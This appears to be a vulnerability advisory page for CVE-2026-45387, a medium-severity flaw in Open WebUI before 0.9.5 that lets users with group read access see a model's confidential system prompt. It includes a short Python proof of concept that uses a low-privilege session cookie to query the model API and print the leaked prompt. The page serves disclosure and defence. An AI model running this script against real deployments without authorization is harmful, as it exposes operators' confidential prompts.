Security Vulnerability Report
CVE-2026-45387 CVSS 4.3 MEDIUM

CVE-2026-45387

Published: 2026-05-15 21:16:37
Last Modified: 2026-05-15 22:16:56

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, setting a model's permissions so that a group has read access to it, with the intent that other users can use the model, also lets those users read the model's system prompt. Because users may consider their system prompt confidential, this is considered a security issue. This vulnerability is fixed in 0.9.5.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
import requests

# Vulnerability Proof of Concept for CVE-2026-45387
# Description: Demonstrates how a low-privilege user can read the system prompt of a model.

target_url = "http://localhost:3000"
model_id = "llama3-70b"  # Example model ID
session_cookie = "session_token_here"  # Low-privilege user session

headers = {
    "Cookie": f"session={session_cookie}",
    "Content-Type": "application/json"
}

# Endpoint to fetch model details (vulnerable endpoint)
endpoint = f"{target_url}/api/models/{model_id}"

print(f"[*] Attempting to fetch details for model: {model_id}")

try:
    response = requests.get(endpoint, headers=headers)
    if response.status_code == 200:
        data = response.json()
        # Check if system_prompt is exposed
        if "system_prompt" in data or "prompt" in data:
            print("[+] Vulnerability Confirmed!")
            print(f"[+] Leaked System Prompt: {data.get('system_prompt', data.get('prompt'))}")
        else:
            print("[-] System prompt not found in response (might be patched or different endpoint)")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45387", "sourceIdentifier": "[email protected]", "published": "2026-05-15T21:16:37.177", "lastModified": "2026-05-15T22:16:55.720", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, when setting model permissions so that a group has read access to it, intending for other users to use it, those users also can read the model's system prompt. However users may consider their system prompt confidential, so this is considered a security issue. This vulnerability is fixed in 0.9.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-h2cw-7qw9-56xr", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-h2cw-7qw9-56xr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}